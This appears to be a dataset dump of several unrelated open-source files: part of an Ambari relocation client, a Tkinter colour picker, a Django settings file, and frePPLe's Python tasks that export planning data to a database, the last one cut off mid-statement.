resp = str(response.getcode())
if text is None:
text = 'Logging response from server: '
if resp is not None:
logger.info(text + resp)
def findClusterName(self):
clusterUrl = getUrl(GET_CLUSTERS_URI)
clusterName = None
logger.info("Requesting clusters: " + clusterUrl)
urlResponse = self.urlOpener.open(clusterUrl)
if urlResponse is not None:
response = urlResponse.read()
data = json.loads(response)
logger.debug('Response from findClusterName: %s' % data)
if data:
try:
clusters = data.get('items')
if len(clusters) > 1:
raise Exception('Multiple clusters found. %s' % clusters)
clusterName = clusters[0].get('Clusters').get('cluster_name')
except Exception, e:
logger.error('Unable to parse json data. %s' % data)
raise e
pass
else:
logger.error("Unable to retrieve clusters data.")
pass
return clusterName
def getHostname(self):
hostsUrl = getUrl(GET_HOST_COMPONENTS_URI.format(CLUSTER_NAME,
self.serviveName, self.componentName))
logger.info("Requesting host info: " + hostsUrl)
urlResponse = self.urlOpener.open(hostsUrl)
hostname = None
if urlResponse is not None:
response = urlResponse.read()
data = json.loads(response)
logger.debug('Response from getHostname: %s' % data)
if data:
try:
hostRoles = data.get('host_components')
if not hostRoles:
raise Exception('Cannot find host component data for service: ' +\
'{0}, component: {1}'.format(self.serviveName, self.componentName))
if len(hostRoles) > 1:
raise Exception('More than one hosts found with the same role')
hostname = hostRoles[0].get('HostRoles').get('host_name')
except Exception, e:
logger.error('Unable to parse json data. %s' % data)
raise e
pass
else:
logger.error("Unable to retrieve host component data.")
pass
return hostname
def getUrl(partial_url):
return PROTOCOL + "://" + AMBARI_HOSTNAME + ":" + AMBARI_PORT + partial_url
def get_supported_actions():
return [ RELOCATE_ACTION ]
#
# Main.
#
def main():
tempDir = tempfile.gettempdir()
outputFile = os.path.join(tempDir, "ambari_reinstall_probe.out")
parser = optparse.OptionParser(usage="usage: %prog [options]")
parser.set_description('This python program is a Ambari thin client and '
'supports relocation of ambari host components on '
'Ambari managed clusters.')
parser.add_option("-v", "--verbose", dest="verbose", action="store_false",
default=False, help="output verbosity.")
parser.add_option("-s", "--host", dest="server_hostname",
help="Ambari server host name.")
parser.add_option("-p", "--port", dest="server_port",
default="8080" ,help="Ambari server port. [default: 8080]")
parser.add_option("-r", "--protocol", dest="protocol", default = "http",
help="Protocol for communicating with Ambari server ("
"http/https) [default: http].")
parser.add_option("-c", "--cluster-name", dest="cluster_name",
help="Ambari cluster to operate on.")
parser.add_option("-e", "--service-name", dest="service_name",
help="Ambari Service to which the component belongs to.")
parser.add_option("-m", "--component-name", dest="component_name",
help="Ambari Service Component to operate on.")
parser.add_option("-n", "--new-host", dest="new_hostname",
help="New host to relocate the component to.")
parser.add_option("-a", "--action", dest="action", default = "relocate",
help="Script action. [default: relocate]")
parser.add_option("-o", "--output-file", dest="outputfile",
default = outputFile, metavar="FILE",
help="Output file. [default: %s]" % outputFile)
parser.add_option("-u", "--username", dest="username",
default="admin" ,help="Ambari server admin user. [default: admin]")
parser.add_option("-w", "--password", dest="password",
default="admin" ,help="Ambari server admin password.")
parser.add_option("-d", "--start-component", dest="start_component",
action="store_false", default=False,
help="Should the script start the component after relocate.")
(options, args) = parser.parse_args()
# set verbose
if options.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
global AMBARI_HOSTNAME
AMBARI_HOSTNAME = options.server_hostname
global AMBARI_PORT
AMBARI_PORT = options.server_port
global CLUSTER_NAME
CLUSTER_NAME = options.cluster_name
global PROTOCOL
PROTOCOL = options.protocol
global USERNAME
USERNAME = options.username
global PASSWORD
PASSWORD = options.password
global START_ON_RELOCATE
START_ON_RELOCATE = options.start_component
global logger
logger = logging.getLogger('AmbariProbe')
handler = logging.FileHandler(options.outputfile)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
action = RELOCATE_ACTION
if options.action is not None:
if options.action not in get_supported_actions():
logger.error("Unsupported action: " + options.action + ", "
"valid actions: " + str(get_supported_actions()))
sys.exit(1)
else:
action = options.action
socket.setdefaulttimeout(DEFAULT_TIMEOUT)
ambariResource = AmbariResource(serviceName=options.service_name,
componentName=options.component_name)
ambariResource.initializeResource()
if action == RELOCATE_ACTION:
if options.new_hostname is not None:
ambariResource.relocate(options.new_hostname)
if __name__ == "__main__":
try:
main()
except (KeyboardInterrupt, EOFError):
print("\nAborting ... Keyboard Interrupt.")
sys.exit(1)
| apache-2.0 | 7,550,866,551,426,205,000 | 33.501022 | 127 | 0.645249 | false | 3.966847 | false | false | false |
fablab-bayreuth/fablight | Fablight-Gui/hcl_picker.py | 1 | 6705 |
from numpy import *
from colorsys import *
import Tkinter as tk
import ttk
import PIL.Image, PIL.ImageTk
ir = lambda x: int(round(x))
#-----------------------------------------------------------------------------------------
# H(CL) picker
class H_CL_Picker:
hue_panel_size = 256, 256
r0, r1 = 0.4*hue_panel_size[0], 0.5*hue_panel_size[0] # Hue circle radii
rt = r0-5 # CL-Triangle outer radius
hue_img, cl_img = None, None
hue, sat, val = 0, 0, 0
def __init__( self, parent, color_broadcast=None ):
self.parent = parent
self.frame = tk.Frame(self.parent)
self.colorbc = color_broadcast
# Get initial color
self.receive_color()
# setup frames
self.canvas = tk.Canvas(self.frame, bd=-2, width=self.hue_panel_size[0], height=self.hue_panel_size[1] )
# Create initial images
self.draw()
# bind event handlers
self.canvas.bind('<Button-1>', self.on_hue_click)
self.canvas.bind('<B1-Motion>', self.on_hue_click)
self.parent.bind('<<NotebookTabChanged>>', self.on_tab_changed)
self.place()
def place(self, **args): # place frames on grid
self.frame.grid(args)
self.canvas.grid(column=0, row=0, padx=(12,12), pady=(12,12), sticky=tk.N+tk.S)
def draw(self):
self.draw_hue()
self.draw_cl()
def draw_hue(self):
W,H = self.hue_panel_size
r0,r1 = self.r0, self.r1
xm,ym = W/2.,H/2.
if (self.hue_img==None): # First call, create static hue-image
d = 255*array([hsv_to_rgb(1.-x,0.9,0.9) for x in arange(256)/255.])
self.hue_data = d.copy()
hue_scale = zeros((H,W,4), dtype=uint8)
# Draw hue circle. THIS IS VERY SLOW!
for y in range(int(ym),H):
clip = lambda x,a,b: a if x<a else (b if x>b else x)
if y-ym>= r0: x0 = xm
else: x0 = clip( xm + sqrt(r0**2-(y-ym)**2), xm, W-1 )
if y-ym>= r1: continue
else: x1 = clip( xm + sqrt(r1**2-(y-ym)**2), xm, W-1 )
for x in range(int(x0), int(x1)):
p = arctan2( y-ym, x-xm )/(2*pi)
hue_scale[y,x] = r_[ d[int(255*p)], 255 ]
hue_scale[H-1-y,x] = r_[ d[int(255*(1-p))], 255 ]
hue_scale[y,W-1-x] = r_[ d[int(255*(0.5-p))], 255 ]
hue_scale[H-1-y,W-1-x] = r_[ d[int(255*(0.5+p))], 255 ]
hue_img = PIL.Image.frombuffer('RGBA', (W,H), hue_scale, 'raw', 'RGBA', 0, 1)
self.hue_img = PIL.ImageTk.PhotoImage( hue_img )
self.canvas.create_image( 0,0, anchor=tk.NW, image=self.hue_img, tag='hue_img' )
phi = self.hue*2*pi
self.hue_marker = self.canvas.create_line(xm+r0*cos(phi), ym+r0*sin(phi),
xm+r1*cos(phi), ym+r1*sin(phi))
self.canvas.tag_bind('hue_img', '<Button-1>', self.foo_hue)
else:
phi = -self.hue*2*pi
self.canvas.coords( self.hue_marker, xm+r0*cos(phi), ym+r0*sin(phi),
xm+r1*cos(phi), ym+r1*sin(phi) )
def foo_hue(self, event):
print 'Fooo Hue'
def draw_cl(self):
W,H = self.hue_panel_size
ro = self.rt ## triangle outer radius
xm,ym = W/2.,H/2.
a = ir(sqrt(3.)*ro) ## Triangle side-length
ri = ir(0.5*ro) ## Triangle inner radius
bw = ir(2*ro) ## width of bounding box
print 'a=', a, 'bw-ri=', bw-ri
if (self.cl_img==None):
# Create triangle mask
cl_mask = zeros( (bw, bw), dtype=uint8)
for x in arange( int(ri), int(bw) ):
h = a/(3*ro)*(bw-x)
for y in arange( int(round(0.5*bw-h)), int(round(0.5*bw+h)) ):
cl_mask[y,x] = 255
self.cl_mask = cl_mask
# Create c-l-triangle ## SLOW ##
##cl_data = zeros( (bw, bw, 4), dtype=uint8)
##for x in arange( ri, bw ):
## h = a/(3*ro)*(bw-x)
## for y in arange( round(0.5*bw-h), round(0.5*bw+h) ):
## cl_data[y,x] = r_[ self.hue_data[255*(1.-self.hue)], 255 ]
# Significantly faster, but somewhat cryptic
rgb = array(hls_to_rgb(self.hue,0.5,1))
# Create sat axis for given hue
##for si in range(256): sat[si,256] = (rgb-1)*si/256.+1
sat = (full((bw-ri,3), rgb )-1) * tile( arange(bw-ri)[:,newaxis], (1,3))/(1.*(bw-ri)) + 1
# Create sat-val plane from sat axis
##for vi in range(256): fd1[:,vi] = fd1[:,256] *vi/256.
sv = transpose( tile(sat[:,newaxis], (a,1) ), (1,0,2) )* ( repeat(arange(a)[::-1],(bw-ri)*3).reshape(a,(bw-ri),3)/(1.*a) )
cl_data = empty( (bw, bw, 4), dtype=uint8)
cl_data[ir(0.5*(bw-a)):ir(0.5*(bw+a)),ri:bw,0:3] = (255*sv).astype(uint8)
cl_data[:,:,3] = self.cl_mask
cl_img = PIL.Image.frombuffer('RGBA', (bw,bw), cl_data, 'raw', 'RGBA', 0, 1)
# Rotate c-l-triangle
cl_img = cl_img.rotate(self.hue*360)
if (self.cl_img==None):
self.cl_img = PIL.ImageTk.PhotoImage( cl_img )
self.canvas.create_image( int(0.5*(W-bw)), int(0.5*(H-bw)), anchor=tk.NW, image=self.cl_img, tag='cl_img' )
self.canvas.tag_bind('cl_img', '<Button-1>', self.foo_cl)
else:
self.cl_img.paste(cl_img)
def foo_cl(self, event):
print 'Fooo cl'
def on_hue_click(self, event):
x = clip( event.x, 0, self.hue_panel_size[0] )
y = clip( event.y, 0, self.hue_panel_size[1] )
print 'x,y =', x, y
xm,ym = self.hue_panel_size[0]/2., self.hue_panel_size[1]/2.
r = sqrt( (x-xm)**2 + (y-ym)**2 )
if r < self.r0: return
phi = -arctan2(y-ym, x-xm)
self.hue = phi/(2*pi)
if self.hue<0: self.hue += 1
if self.hue==-0.0: self.hue = 0.0
print "hue=", self.hue
self.draw()
self.broadcast_color()
def on_tab_changed(self, event):
print 'H(CL) tab'
self.draw()
self.broadcast_color()
def broadcast_color(self):
if self.colorbc:
rgb = hsv_to_rgb(self.hue, self.sat, self.val)
var = ( ('H',self.hue), ('S',self.sat), ('V',self.val) )
self.colorbc.set( rgb, var )
def receive_color(self):
if self.colorbc:
r,g,b = self.colorbc.get_rgb()
else: r,g,b = 0,0,0
self.hue, self.sat, self.val = rgb_to_hsv(r,g,b)
| mit | 7,908,502,349,392,331,000 | 36.881356 | 130 | 0.489933 | false | 2.936925 | false | false | false |
aligot-project/aligot | aligot/settings.py | 2 | 2431 |
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ldxl71%#nruwupjnjy&=&9hjyg2o--gavcsx5!*)rwoq08&=9$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'aligot',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'aligot.urls'
WSGI_APPLICATION = 'aligot.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': os.getenv('DB_ENGINE', 'django.db.backends.sqlite3'),
'NAME': os.getenv('DB_NAME', os.path.join(BASE_DIR, 'db.sqlite3')),
'USER': os.getenv('DB_USER', ''),
'PASSWORD': os.getenv('DB_PASSWORD', ''),
'HOST': os.getenv('DB_HOST', ''),
'PORT': os.getenv('DB_PORT', ''),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
'/var/www/static/',
)
# Auth
AUTH_USER_MODEL = 'aligot.User'
# rest_framework
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
),
'TEST_REQUEST_DEFAULT_FORMAT': 'json'
}
| mit | -2,162,574,461,606,079,000 | 22.833333 | 75 | 0.684903 | false | 3.263087 | false | false | false |
frePPLe/frePPLe | freppledb/input/commands/export.py | 1 | 54190 | #
# Copyright (C) 2020 by frePPLe bv
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero
# General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from datetime import datetime
import logging
from psycopg2.extras import execute_batch
from django.db import DEFAULT_DB_ALIAS, connections
from freppledb.boot import getAttributes
from freppledb.common.commands import PlanTaskRegistry, PlanTask
from freppledb.input.models import (
Buffer,
Calendar,
CalendarBucket,
Customer,
Demand,
Item,
ItemSupplier,
ItemDistribution,
Location,
Operation,
OperationMaterial,
OperationResource,
Resource,
ResourceSkill,
SetupMatrix,
SetupRule,
Skill,
Supplier,
)
logger = logging.getLogger(__name__)
# Default effectivity dates; dates equal to these sentinel values are exported as NULL
default_start = datetime(1971, 1, 1)
default_end = datetime(2030, 12, 31)
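# Translation of frePPLe's numeric search mode into the text value stored in the database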
map_search = {0: "PRIORITY", 1: "MINCOST", 2: "MINPENALTY", 3: "MINCOSTPENALTY"}
def SQL4attributes(attrs, with_on_conflict=True):
    """Return the SQL fragments (column names, placeholders and optionally the
    on-conflict update clause) for the given custom attribute columns; this
    snippet is used many times in this file."""
if with_on_conflict:
return (
"".join([",%s" % i for i in attrs]),
",%s" * len(attrs),
"".join([",\n%s=excluded.%s" % (i, i) for i in attrs]),
)
else:
return ("".join([",%s" % i for i in attrs]), ",%s" * len(attrs))
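# Example (with hypothetical attribute columns): SQL4attributes(["color", "weight"])
# returns (",color,weight", ",%s,%s", ",\ncolor=excluded.color,\nweight=excluded.weight"),
# fragments that the export tasks below splice into their insert statements.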
@PlanTaskRegistry.register
class cleanStatic(PlanTask):
description = "Clean static data"
sequence = 300
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
if kwargs.get("exportstatic", False) and kwargs.get("source", None):
return 1
else:
return -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
source = kwargs.get("source", None)
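        # Purge records tagged with this source that weren't touched in the current
        # run (their lastmodified differs from the run timestamp). Child tables are
        # deleted before the tables they reference.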
with connections[database].cursor() as cursor:
cursor.execute(
"""
delete from operationmaterial
where (source = %s and lastmodified <> %s)
or operation_id in (
select name from operation
where operation.source = %s and operation.lastmodified <> %s
)
""",
(source, cls.timestamp, source, cls.timestamp),
)
cursor.execute(
"delete from buffer where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from operationplan where demand_id in (select name from demand where source = %s and lastmodified <> %s)",
(source, cls.timestamp),
)
cursor.execute(
"delete from demand where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from itemsupplier where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from itemdistribution where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"""
delete from operationplan
where owner_id is not null and ((source = %s and lastmodified <> %s)
or operation_id in (
select name from operation
where operation.source = %s and operation.lastmodified <> %s
)
or supplier_id in (
select name from supplier where source = %s and lastmodified <> %s
))
""",
(source, cls.timestamp, source, cls.timestamp, source, cls.timestamp),
)
cursor.execute(
"""
delete from operationplan
where (source = %s and lastmodified <> %s)
or operation_id in (
select name from operation
where operation.source = %s and operation.lastmodified <> %s
)
or supplier_id in (
select name from supplier where source = %s and lastmodified <> %s
)
""",
(source, cls.timestamp, source, cls.timestamp, source, cls.timestamp),
)
cursor.execute(
"""
delete from operationresource
where (source = %s and lastmodified <> %s)
or operation_id in (
select name from operation
where operation.source = %s and operation.lastmodified <> %s
)
""",
(source, cls.timestamp, source, cls.timestamp),
)
cursor.execute(
"delete from operation where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from item where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from resourceskill where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from operation where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from resource where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from location where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from calendarbucket where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from calendar where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from skill where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from setuprule where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from setupmatrix where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from customer where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from supplier where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
@PlanTaskRegistry.register
class exportParameters(PlanTask):
description = ("Export static data", "Export parameters")
sequence = (301, "exportstatic1", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
        # Only a complete export (without a source filter) should save the current date
if kwargs.get("exportstatic", False) and not kwargs.get("source", None):
return 1
else:
return -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
with connections[database].cursor() as cursor:
# Update current date if the parameter already exists
# If it doesn't exist, we want to continue using the system clock for the next run.
cursor.execute(
"update common_parameter set value=%s, lastmodified=%s where name='currentdate'",
(frepple.settings.current.strftime("%Y-%m-%d %H:%M:%S"), cls.timestamp),
)
@PlanTaskRegistry.register
class exportCalendars(PlanTask):
description = ("Export static data", "Export calendars")
sequence = (301, "exportstatic2", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Calendar)]
def getData():
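            # Yield one database row per calendar, skipping hidden calendars,
            # calendars generated from the common_bucket table and, when a source
            # filter is given, calendars from other sources.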
for i in frepple.calendars():
if (
i.hidden
or i.source == "common_bucket"
or (source and source != i.source)
):
continue
r = [i.name, round(i.default, 8), i.source, cls.timestamp]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into calendar
(name,defaultvalue,source,lastmodified%s)
values(%%s,%%s,%%s,%%s%s)
on conflict (name)
do update set
defaultvalue=excluded.defaultvalue,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportLocations(PlanTask):
description = ("Export static data", "Export locations")
sequence = (302, "exportstatic1", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Location)]
def getData():
for i in frepple.locations():
if source and source != i.source:
continue
r = [
i.name,
i.description,
i.available and i.available.name or None,
i.category,
i.subcategory,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
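        # Owners are filled in with a second pass (see the update statement below),
        # after all locations have been inserted, so the referenced parent row is
        # already present.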
def getOwners():
for i in frepple.locations():
if i.owner and (not source or source == i.source):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into location
(name,description,available_id,category,subcategory,source,lastmodified,owner_id%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
description=excluded.description,
available_id=excluded.available_id,
category=excluded.category,
subcategory=excluded.subcategory,
source=excluded.source,
lastmodified=excluded.lastmodified,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update location set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportItems(PlanTask):
description = ("Export static data", "Export items")
sequence = (302, "exportstatic2", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Item)]
def getData():
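            # Yield one row per item; the type column distinguishes make-to-order
            # from make-to-stock items.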
for i in frepple.items():
if source and source != i.source:
continue
r = [
i.name,
i.description,
round(i.cost, 8),
i.category,
i.subcategory,
"make to order"
if isinstance(i, frepple.item_mto)
else "make to stock",
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.items():
if i.owner and (not source or source == i.source):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into item
(name,description,cost,category,subcategory,type,source,lastmodified,owner_id%s)
values (%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
description=excluded.description,
cost=excluded.cost,
category=excluded.category,
subcategory=excluded.subcategory,
type=excluded.type,
source=excluded.source,
lastmodified=excluded.lastmodified,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update item set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportOperations(PlanTask):
description = ("Export static data", "Export operations")
sequence = (303, "exportstatic1", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Operation)]
def getData():
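            # Yield one row per operation, skipping hidden operations and the
            # auto-generated item supplier / item distribution operations.
            # The type column is obtained by stripping the "operation_" prefix
            # from the class name.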
for i in frepple.operations():
if (
i.hidden
or (source and source != i.source)
or isinstance(
i,
(
frepple.operation_itemsupplier,
frepple.operation_itemdistribution,
),
)
):
continue
r = [
i.name,
i.fence,
i.posttime,
round(i.size_minimum, 8),
round(i.size_multiple, 8),
i.size_maximum < 9999999999999 and round(i.size_maximum, 8) or None,
i.__class__.__name__[10:],
i.duration
if isinstance(
i, (frepple.operation_fixed_time, frepple.operation_time_per)
)
else None,
i.duration_per
if isinstance(i, frepple.operation_time_per)
else None,
i.location and i.location.name or None,
round(i.cost, 8),
map_search[i.search],
i.description,
i.category,
i.subcategory,
i.source,
i.item.name if i.item else None,
i.priority if i.priority != 1 else None,
i.effective_start if i.effective_start != default_start else None,
i.effective_end if i.effective_end != default_end else None,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.operations():
if (
i.owner
and not i.hidden
and not i.owner.hidden
and (not source or source == i.source)
and not isinstance(
i,
(
frepple.operation_itemsupplier,
frepple.operation_itemdistribution,
),
)
):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
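            # Duration fields (fence, posttime, duration, duration_per) are passed
            # as a number of seconds and converted to intervals by multiplying with
            # interval '1 second' inside the SQL statement.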
execute_batch(
cursor,
"""
insert into operation
(name,fence,posttime,sizeminimum,sizemultiple,sizemaximum,type,
duration,duration_per,location_id,cost,search,description,category,
subcategory,source,item_id,priority,effective_start,effective_end,
lastmodified,owner_id%s)
values(%%s,%%s * interval '1 second',%%s * interval '1 second',%%s,%%s,
%%s,%%s,%%s * interval '1 second',%%s * interval '1 second',%%s,%%s,%%s,
%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
fence=excluded.fence,
posttime=excluded.posttime,
sizeminimum=excluded.sizeminimum,
sizemultiple=excluded.sizemultiple,
sizemaximum=excluded.sizemaximum,
type=excluded.type,
duration=excluded.duration,
duration_per=excluded.duration_per,
location_id=excluded.location_id,
cost=excluded.cost,
search=excluded.search,
description=excluded.description,
category=excluded.category,
subcategory=excluded.subcategory,
source=excluded.source,
item_id=excluded.item_id,
priority=excluded.priority,
effective_start=excluded.effective_start,
effective_end=excluded.effective_end,
lastmodified=excluded.lastmodified,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update operation set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportSetupMatrices(PlanTask):
description = ("Export static data", "Export setup matrices")
sequence = (303, "exportstatic2", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(SetupMatrix)]
def getData():
for i in frepple.setupmatrices():
if source and source != i.source:
continue
r = [i.name, i.source, cls.timestamp]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into setupmatrix
(name,source,lastmodified%s)
values(%%s,%%s,%%s%s)
on conflict (name)
do update set
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportResources(PlanTask):
description = ("Export static data", "Export resources")
sequence = 304
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Resource)]
def getData():
for i in frepple.resources():
if i.hidden or (source and source != i.source):
continue
r = [
i.name,
i.description,
i.maximum,
i.maximum_calendar.name if i.maximum_calendar else None,
i.location and i.location.name or None,
i.__class__.__name__[9:],
round(i.cost, 8),
i.maxearly,
i.setup,
i.setupmatrix.name if i.setupmatrix else None,
i.category,
i.subcategory,
i.efficiency,
i.efficiency_calendar.name if i.efficiency_calendar else None,
i.available.name if i.available else None,
i.constrained,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.resources():
if not i.hidden and i.owner and (not source or source == i.source):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into resource
(name,description,maximum,maximum_calendar_id,location_id,type,cost,
maxearly,setup,setupmatrix_id,category,subcategory,efficiency,
efficiency_calendar_id,available_id,constrained,source,lastmodified,owner_id%s)
values(
%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s * interval '1 second',%%s,%%s,%%s,%%s,
%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
description=excluded.description,
maximum=excluded.maximum,
maximum_calendar_id=excluded.maximum_calendar_id,
location_id=excluded.location_id,
type=excluded.type,
cost=excluded.cost,
maxearly=excluded.maxearly,
setup=excluded.setup,
setupmatrix_id=excluded.setupmatrix_id,
category=excluded.category,
subcategory=excluded.subcategory,
efficiency=excluded.efficiency,
efficiency_calendar_id=excluded.efficiency_calendar_id,
available_id=excluded.available_id,
constrained=excluded.constrained,
source=excluded.source,
lastmodified=excluded.lastmodified,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update resource set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportSetupRules(PlanTask):
description = ("Export static data", "Export setup matrix rules")
sequence = (305, "exportstatic1", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(SetupRule)]
def getData():
for m in frepple.setupmatrices():
for i in m.rules:
if source and source != i.source:
continue
r = [
m.name,
i.priority,
i.fromsetup,
i.tosetup,
i.duration,
round(i.cost, 8),
i.resource.name if i.resource else None,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into setuprule
(setupmatrix_id,priority,fromsetup,tosetup,duration,cost,resource_id,source,lastmodified%s)
